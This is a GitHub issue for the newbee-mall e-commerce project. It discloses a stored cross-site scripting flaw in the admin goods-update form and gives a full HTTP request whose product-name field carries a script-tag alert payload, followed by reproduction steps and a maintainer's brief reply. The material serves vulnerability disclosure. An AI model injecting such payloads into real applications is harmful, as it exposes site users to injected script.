search

newbee-ltd / newbee-mall

🔥 🎉newbee-mall是一套电商系统,包括基础版本(Spring Boot+Thymeleaf)、前后端分离版本(Spring Boot+Vue 3+Element-Plus+Vue-Router 4+Pinia+Vant 4) 、秒杀版本、Go语言版本、微服务版本(Spring Cloud Alibaba+Nacos+Sentinel+Seata+Spring Cloud Gateway+OpenFeign+ELK)。 前台商城系统包含首页门户、商品分类、新品上线、首页轮播、商品推荐、商品搜索、商品展示、购物车、订单结算、订单流程、个人订单管理、会员中心、帮助中心等模块。 后台管理系统包含数据面板、轮播图管理、商品管理、订单管理、会员管理、分类管理、设置等模块。
https://item.jd.com/12890115.html
GNU General Public License v3.0
11.1k stars 2.71k forks source link

There is a Cross site scripting vulnerability exists in newbee-mall #64

Closed afeng2016-s closed 2 years ago

afeng2016-s commented 2 years ago

[Suggested description] There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

[Vulnerability Type] Cross site scripting vulnerability

[Vendor of Product] https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base] v1.0.0

[Affected Component] 

POST /admin/goods/update HTTP/1.1
Host: localhost:28089
Content-Length: 392
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json
Origin: http://localhost:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
Connection: close

{"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}

[Impact Code execution] true

[Vulnerability proof] 1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing. image

2.Enter in the input box and click Save to complete the form information submission. image

image

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed image

ZHENFENG13 commented 2 years ago

如果担心某个字符串类型的字端存在xss漏洞,可以直接使用NewBeeMallUtils中的cleanString()方法,后续再有类似的issue就不再处理,直接关闭了。